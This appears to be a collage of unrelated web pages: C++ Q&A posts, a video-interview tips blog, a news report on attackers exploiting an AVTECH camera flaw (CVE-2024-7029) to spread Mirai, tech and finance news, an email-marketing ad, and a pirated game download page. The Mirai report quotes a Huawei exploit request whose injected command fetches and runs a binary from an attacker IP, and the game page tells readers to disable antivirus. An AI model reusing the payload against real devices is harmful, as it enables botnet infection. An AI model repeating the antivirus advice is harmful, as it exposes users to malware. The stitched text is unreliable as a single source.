c++ – Unwanted border around the window


I have a very simple wxFrame with wxButton inside it:

screenshot

I created it like below:

...
public:
    MyFrame(wxWindow* ptr, int id, wxString name, wxPoint pos, wxSize size) : wxFrame(ptr, id, name, pos, size, wxBORDER_NONE)
    {
        ...
        HelloWorld = new wxButton(this, wxID_HIGHEST + 1, _T("Hello World"),
        wxDefaultPosition, wxDefaultSize, 0); 
        ...
    }

I’m still getting this thin grey borders around the button (seen next to the left and up button sides) even if I set wxBORDER_NONE for the parent frame!

Why is that unwanted border there, and HOW do I get rid of it completely?

P.S: The attached image is, of course, enlarged for better visibility.

10 Body Language Tips for a Video/Virtual Interview


In today’s digital age, video interviews have become a common part of the hiring process. While preparing for the content of your interview is crucial, your body language can also significantly impact how you are perceived by potential employers.

Non-verbal cues such as eye contact, posture, and facial expressions play a vital role in conveying confidence, professionalism, and engagement. In this blog, we will explore ten essential body language tips to help you make a positive impression during your video interview.

10 Body Language Tips for a Video Interview

Body language plays a crucial role in video interviews, just as it does in face-to-face meetings. Here are body language tips to help you make a positive impression during your video interview:

1. Maintain Eye Contact:

  • Look at the Camera: Position your webcam at eye level and look directly into it when speaking. This simulates eye contact and shows engagement.
  • Avoid Looking at the Screen: While it’s natural to look at the interviewer’s image on the screen, try to focus on the camera to maintain the appearance of eye contact.

2. Sit Up Straight:

  • Posture: Sit up straight with your back against the chair. Good posture conveys confidence and professionalism.
  • Avoid Slouching: Slouching can make you appear disinterested or unprofessional.

3. Use Hand Gestures:

  • Natural Gestures: Use natural hand gestures to emphasize points and convey enthusiasm. Keep your gestures within the frame of the camera.
  • Avoid Overdoing It: Excessive or exaggerated gestures can be distracting.

4. Smile Naturally:

  • Positive Expression: A genuine smile can create a positive and approachable impression.
  • Relaxed Face: Keep your facial expressions relaxed and positive throughout the interview.

. Position Yourself Properly:

  • Center Yourself: Position yourself in the center of the camera frame with your head and shoulders visible.
  • Distance from Camera: Maintain a comfortable distance from the camera, not too close and not too far, so that your face is clearly visible.

6. Use a Neutral Background:

  • Professional Setting: Choose a clean, clutter-free background that is free from distractions for remote job interview.
  • Good Lighting: Ensure your face is well-lit by using natural light or a desk lamp. Avoid backlighting, which can create shadows.

7. Dress Professionally:

  • Appropriate Attire: Dress as you would for an in-person interview, in professional or business casual attire.
  • Avoid Distracting Patterns: Choose solid colors or subtle patterns that look good on camera and avoid overly bright or distracting clothing.

8.Nod and Respond:

  • Active Listening: Nod occasionally to show that you are actively listening and engaged in the conversation during a zoom interview.
  • Verbal Cues: Use verbal cues like “I see,” “Absolutely,” or “That makes sense” to indicate understanding and engagement.

9. Control Nervous Habits:

  • Avoid Fidgeting: Be mindful of nervous habits like tapping your fingers, shaking your leg, or playing with your hair, as these can be distracting.
  • Stay Still: Keep your movements controlled and deliberate to maintain a calm and composed appearance.

10. Stay Calm and Confident:

  • Deep Breaths: Take deep breaths to calm your nerves before the interview starts.
  • Positive Mindset: Maintain a confident and positive mindset throughout the interview. Confidence will be reflected in your body language.

Land Your Next Remote Job Interview With DailyRemote

By paying attention to these body language tips, you can create a positive and professional impression during your video or zoom interview. Remember, your non-verbal cues are just as important as your verbal responses. Mastering your body language during a video interview can set you apart from other candidates and leave a lasting positive impression on your potential employer.

By maintaining eye contact, sitting up straight, using natural gestures, and staying calm and confident, you can effectively communicate your enthusiasm and professionalism. Implement these body language tips in your next virtual interview to increase your chances of success and move one step closer to landing your desired remote job.

If you are  looking for remote work, there’s no better place to start than DailyRemote. So, what are you waiting for? Get started today, find the remote job of your dreams, start applying today. Join like-minded people in our



Unpatchable 0-day in surveillance cam is being exploited to install Mirai


The word ZERO-DAY is hidden amidst a screen filled with ones and zeroes.

Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a family of malware that wrangles infected Internet of Things devices into large networks for use in attacks that take down websites and other Internet-connected devices.

The attacks target the AVM1203, a surveillance device from Taiwan-based manufacturer AVTECH, network security provider Akamai said Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.

That time a ragtag army shook the Internet

Akamai said that the attackers are exploiting the vulnerability so they can install a variant of Mirai, which arrived in September 2016 when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained functionality that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to wage distributed denial-of-service attacks of record-setting sizes. In the weeks that followed, the Mirai botnet delivered similar attacks on Internet service providers and other targets. One such attack, against dynamic domain name provider Dyn paralyzed vast swaths of the Internet.
Complicating attempts to contain Mirai, its creators released the malware to the public, a move that allowed virtually anyone to create their own botnets that delivered DDoSes of once-unimaginable size.

Kyle Lefton, a security researcher with Akamai’s Security Intelligence and Response Team, said in an email that it has observed the threat actor behind the attacks perform DDoS attacks against “various organizations,” which he didn’t name or describe further. So far, the team hasn’t seen any indication the threat actors are monitoring video feeds or using the infected cameras for other purposes.

Akamai detected the activity using a “honeypot” of devices that mimic the cameras on the open Internet to observe any attacks that target them. The technique doesn’t allow the researchers to measure the botnet’s size. The US Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.

The technique, however, has allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019 when exploit code became public. The zero-day resides in the “brightness argument in the ‘action=’ parameter” and allows for command injection, researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, wasn’t formally recognized until this month, with the publishing of CVE-2024-7029.

Wednesday’s post went on to say:

How does it work?

This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.
Decoded payload

Fig. 1: Decoded payload body of the exploit attempts
Enlarge / Fig. 1: Decoded payload body of the exploit attempts

Akamai

Fig. 1: Decoded payload body of the exploit attempts

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit
Enlarge / Fig. 2: PoC of the exploit

Akamai

What could happen?

In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader
Enlarge / Fig. 3: Strings from the JavaScript downloader

Akamai

In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus.

Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Execution of malware showing output to console
Enlarge / Fig. 4: Execution of malware showing output to console

Akamai

Static analysis of the strings in the malware samples shows targeting of the path /ctrlt/DeviceUpgrade_1 in an attempt to exploit Huawei devices affected by CVE-2017-17215. The samples have two hard-coded command and control IP addresses, one of which is part of the CVE-2017-17215 exploit code:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
  Content-Length: 430
  Connection: keep-alive
  Accept: */*
  Authorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"

  $(/bin/busybox wget -g 45.14.244[.]89 -l /tmp/mips -r /mips; /bin/busybox chmod 777 * /tmp/mips; /tmp/mips huawei.rep)$(echo HUAWEIUPNP)

The botnet also targeted several other vulnerabilities including a Hadoop YARN RCE, CVE-2014-8361, and CVE-2017-17215. We have observed these vulnerabilities exploited in the wild several times, and they continue to be successful.

Given that this camera model is no longer supported, the best course of action for anyone using one is to replace it. As with all Internet-connected devices, IoT devices should never be accessible using the default credentials that shipped with them.

Vizrt TriCaster Flex Dual Tutorial: Controlling Effects


In this YouTube video, Vizrt shows us how to control switcher and DSK effects with the TriCaster Flex Dual.

TriCaster Flex Dual is Vizrt’s most powerful control panel yet – offering unique connectivity and never before seen features that put operators firmly in the driving seat to tell their stories, the way they want to. TriCaster Flex Dual offers an unparalleled number of user definable ways of working and customizable workflows that evolves to meet the need of any production with 24 direct cross points and two 10-key dynamic menu systems as well as many other innovative features including, for the first time on a Flex panel, a full-size joystick.

Watch the full video from Vizrt below:


Learn more about Vizrt below:

Age of Mythology Retold Free Download


Age of Mythology Retold Free Download By WorldofpcgamesAge of Mythology Retold Free Download By Worldofpcgames

Age of Mythology Retold Direct Download:

From the creators of the award-winning Age of Empires franchise, Age of Mythology: Retold goes beyond history to a mythical age where gods, monsters, and humans collide. Combining the best elements of the beloved Age of Mythology with modern real-time strategy design and visuals, Retold is an epic and innovative experience for old and new players alike. Secure your domain, command legendary monsters, and call upon the power of the gods to crush your enemies. Choose your gods from the Greek, Norse, Egyptian, and Atlantean pantheons. Devastate your enemies by summoning powerful lightning storms, earth-shattering quakes, and even the famed Nidhogg dragon. Or call upon nourishing rains and protective Dryads to help your people grow & prosper. Unleash Centaurs, Trolls, Mummies, and more.

From bejeweled crocodiles who harness the power of the sun to the mighty one-eyed Cyclops, you will command diverse units inspired by the world’s great mythologies. Embark on multiple campaigns spanning 50-missions that take you across a vast, mythical world: besiege the mighty walls of Troy, battle Giants in the frozen wastes of Midgard, and discover the mysteries of Osiris in the shifting sands of Egypt. Become a hero of myth—or even a god. Play with your friends, either head-to-head or against the advanced AI on dozens of randomly generated maps and scenarios for limitless re-playability. * Embark on a gaming journey of first-class offerings with the Age of Mythology: Retold Premium Edition.  Curated to offer an elevated gaming experience at launch and beyond.

Features and System Requirements:

  • The game will include various quality-of-life improvements, such as better AI, refined pathfinding, and gameplay tweaks that enhance the overall experience without changing the core mechanics.
  • Modernized multiplayer capabilities are expected, including better matchmaking, updated servers, and possibly new modes that enhance the multiplayer experience.
  • Although not confirmed, cross-platform play between PC and other possible platforms could be included, allowing a broader community of players to engage with each other.

Screenshots

System Requirements

Requires a 64-bit processor and operating system
OS: Windows 10 64bit
Processor: 3.6 Ghz i5 or greater or AMD equivalent and AVX support
Memory: 16 GB RAM
Graphics: Nvidia® GeForce® GTX 970 or AMD Radeon™ RX 570 or better
DirectX: Version 12
Storage: 25 GB available space

Installation Guide

Turn Off Your Antivirus Before Installing Any Game

1 :: Download Game
2 :: Extract Game
3 :: Launch The Game
4 :: Have Fun 🙂

NVIDIA Blackwell Sets New Standard for Gen AI in MLPerf Inference Debut



As enterprises race to adopt generative AI and bring new services to market, the demands on data center infrastructure have never been greater. Training large language models is one challenge, but delivering LLM-powered real-time services is another.

In the latest round of MLPerf industry benchmarks, Inference v4.1, NVIDIA platforms delivered leading performance across all data center tests. The first-ever submission of the upcoming NVIDIA Blackwell platform revealed up to 4x more performance than the NVIDIA H100 Tensor Core GPU on MLPerf’s biggest LLM workload, Llama 2 70B, thanks to its use of a second-generation Transformer Engine and FP4 Tensor Cores.

The NVIDIA H200 Tensor Core GPU delivered outstanding results on every benchmark in the data center category — including the latest addition to the benchmark, the Mixtral 8x7B mixture of experts (MoE) LLM, which features a total of 46.7 billion parameters, with 12.9 billion parameters active per token.

MoE models have gained popularity as a way to bring more versatility to LLM deployments, as they’re capable of answering a wide variety of questions and performing more diverse tasks in a single deployment. They’re also more efficient since they only activate a few experts per inference — meaning they deliver results much faster than dense models of a similar size.

The continued growth of LLMs is driving the need for more compute to process inference requests. To meet real-time latency requirements for serving today’s LLMs, and to do so for as many users as possible, multi-GPU compute is a must. NVIDIA NVLink and NVSwitch provide high-bandwidth communication between GPUs based on the NVIDIA Hopper architecture and provide significant benefits for real-time, cost-effective large model inference. The Blackwell platform will further extend NVLink Switch’s capabilities with larger NVLink domains with 72 GPUs.

In addition to the NVIDIA submissions, 10 NVIDIA partners — ASUSTek, Cisco, Dell Technologies, Fujitsu, Giga Computing, Hewlett Packard Enterprise (HPE), Juniper Networks, Lenovo, Quanta Cloud Technology and Supermicro — all made solid MLPerf Inference submissions, underscoring the wide availability of NVIDIA platforms.

Relentless Software Innovation

NVIDIA platforms undergo continuous software development, racking up performance and feature improvements on a monthly basis.

In the latest inference round, NVIDIA offerings, including the NVIDIA Hopper architecture, NVIDIA Jetson platform and NVIDIA Triton Inference Server, saw leaps and bounds in performance gains.

The NVIDIA H200 GPU delivered up to 27% more generative AI inference performance over the previous round, underscoring the added value customers get over time from their investment in the NVIDIA platform.

Triton Inference Server, part of the NVIDIA AI platform and available with NVIDIA AI Enterprise software, is a fully featured open-source inference server that helps organizations consolidate framework-specific inference servers into a single, unified platform. This helps lower the total cost of ownership of serving AI models in production and cuts model deployment times from months to minutes.

In this round of MLPerf, Triton Inference Server delivered near-equal performance to NVIDIA’s bare-metal submissions, showing that organizations no longer have to choose between using a feature-rich production-grade AI inference server and achieving peak throughput performance.

Going to the Edge

Deployed at the edge, generative AI models can transform sensor data, such as images and videos, into real-time, actionable insights with strong contextual awareness. The NVIDIA Jetson platform for edge AI and robotics is uniquely capable of running any kind of model locally, including LLMs, vision transformers and Stable Diffusion.

In this round of MLPerf benchmarks, NVIDIA Jetson AGX Orin system-on-modules achieved more than a 6.2x throughput improvement and 2.4x latency improvement over the previous round on the GPT-J  LLM workload. Rather than developing for a specific use case, developers can now use this general-purpose 6-billion-parameter model to seamlessly interface with human language, transforming generative AI at the edge.

Performance Leadership All Around

This round of MLPerf Inference showed the versatility and leading performance of NVIDIA platforms — extending from the data center to the edge — on all of the benchmark’s workloads, supercharging the most innovative AI-powered applications and services. To learn more about these results, see our technical blog.

H200 GPU-powered systems are available today from CoreWeave — the first cloud service provider to announce general availability — and server makers ASUS, Dell Technologies, HPE, QTC and Supermicro.

See notice regarding software product information.

c++ – Visual Studio debugger running old version of code


When I try to modify a specific header file in my code (all other files have no issues when modified), upon building and running (debug or release, doesn’t matter), it seems to run with the old version of the header and prevents use of breakpoints there. (It also informs me that a copy of the offending file was found with different contents).

If I modify the offending file in ways that are syntactically correct, it runs the old version, but if I modify the offending file such that it generates compile-time errors then it simply fails to run after failing to build.

Cleaning the solution and rebuilding makes it work as expected, but only until I modify the file again at which point I have to rebuild the entire solution again, which is not ideal.

I tried deleting all “.vs” folders in my project, but it just had the same effect as rebuilding the solution. Deleting the .pdb/.exe files did nothing, the build output mentions they were missing, relinked them, and had the same issue immediately. I also tried deleting and replacing the file, and even creating a new header with a different name and the same contents and including that instead, but ran into the same issue after modifying it again. Disabling in the debugger options to “Require source files to exactly match” did not help either. There were a few other settings and tricks I tried that I found on here that didn’t work, but I can’t recall them right now.

Any ideas? I’ve tried various solutions listed on this site and have had no success so far. Thanks.

One of Bolt’s proposed new backers, the London Fund, has been scrubbing its web page


One-click checkout tech company Bolt is still waiting to find out if shareholders will sign off on a proposed funding round with stipulations that founder Ryan Breslow would return as CEO. In the meantime, Axios’s Dan Primack did some digging around on The London Fund, a firm that is supposed to provide up to $250 million in “marketing credits” to Bolt as part of the proposed transaction. Turns out that a number of that firm’s so-called portfolio companies don’t appear to be portfolio companies at all.

The fact that The London Fund might have exaggerated the extent of its prior investing is particularly concerning considering that the proposed deal also called for Bolt making an investment into The London Fund and Breslow joining its board, Axios reported. After Primack’s queries, Bolt has apparently been scrubbing its web page to remove the investments that were in question. The number of portfolio companies displayed on its site dropped from 20 to 13, according to Primack. The firm didn’t respond to Axios’ request for comment. TechCrunch has reached out as well.

Rest Assured, Your Emails are Getting to the Inbox


Young man sitting on the floor with a satisfied, proud and happy look with thumbs up, signaling OK with one hand, sending a positive, "alright' message.

It doesn’t matter how pretty or sophisticated your emails are if they aren’t getting to the inbox.

Email communication is more important than ever and getting to the inbox is crucial to your success.

And getting to the inbox depends on the sender reputation of your bulk email service provider (ESP).

Not all ESPs are the same.

In simple terms, deliverability means the likelihood of your emails reaching your subscribers’ inboxes. It’s one of the reasons you choose to work with an ESP. We focus on achieving the highest deliverability rate and sender reputation possible to ensure the emails of our clients all reach their desired destinations.

What is a sender reputation?
A sender reputation is how individual internet service providers (ISPs) rate ESPs in terms of how safe they are as senders. A sender reputation lets Gmail, Apple mail, Yahoo and all the other ISP email services know that your ESP is trusted, and that it’s A-OK to allow your emails to reach the inbox. It’s a complex process that requires diligence and constant monitoring.

We can’t speak for every ESP on the market, but at FeedBlitz, protecting our deliverability and sender reputation is our leading principle. Without it, the emails you send are as useful as smoke signals in a thunderstorm.

How do ESPs get emails to the inbox?

Excellent deliverabillity requires a complex and continuous process to maintain. An ESP’s sender reputation is protected through a system of automated processes, monitoring, and manual review including:

  • Strict checks for all imports. Every email address added to our system is checked against known spam traps, blacklists, and honey pots. Questionable email addresses are flagged by our system and stop the import.

    *Fun fact: Our system also runs a plagiarism-style check on imported lists, this flags any sets of email addresses imported into more than one account. Purchased lists don’t meet our standards.

  • 24-hour monitoring of all mailing lists. Every mailing list is checked for spam complaints, bounce rates, and excessive unsubscribes. If the list fails to meet the minimum standard, it is automatically suspended. This ensures the health of mailing lists across all clients of an ESP.

    …because an ESP is only as healthy and reputable as its weakest list!

  • Continuous adjustments for individual ISPs. ISPs are always tweaking their spam filters usually with very little notice. Accommodating for these changes requires constant adjustment of internal email servers to meet these requirements..
  • Preventing questionable emails from being sent. Before a single mailing campaign is scheduled or sent, FeedBlitz runs a series of checks to enure the content doesn’t contain features that might be flagged as spam. This includes checking for common words, phrases, and content styling (multiple, unnecessary page breaks, for example), which could cause the email to be caught by an ISP’s spam filter.

    Flagging one potentially bad email and preventing it from being sent protects the reputation of all emails.

  • Automatically removing bounced emails. Sender reputation is bolstered by an ESP frequently sending mail healthy mailing lists, creating a strong track record with ISPs. To maintain this reputation email addresses that bounce or return as undeliverable are automatically removed from your mailing list.

    You wouldn’t keep knocking on a door if you knew no one was home, would you?

Be the hero of your email marketing.

When email is the primary method of communication between you and your audience, it only makes sense for your ESP to ensure your emails are reaching the inbox. What do all the bells and whistles matter if your emails can’t be found?

If you’re struggling to consistently reach the inbox for some recipients, or your your ESP’s open rates are disappointing you, reach out. We’re confident we’ll be able to make a positive difference in your email marketing.

Learn more about our free trial and reach out to us on our Support Page to contact us via email, chat, or even over the phone. Live support is available Monday to Friday, 9 AM to 5 PM Eastern.

SEC Threatens Legal Action Against NFT Marketplace OpenSea


U.S. Securities and Exchange Commission (SEC) has issued a Wells notice to OpenSea, the leading non-fungible token (NFT) marketplace, threatening legal action over alleged securities violations. The SEC contends that NFTs traded on OpenSea’s platform may constitute securities, a move that could have far-reaching implications for the digital art and collectibles industry. OpenSea CEO Devin Finzer denounced the SEC’s action as an overreach that could stifle innovation and harm creators. The company pledged $5 million to cover legal fees for NFT creators and developers who receive Wells notices.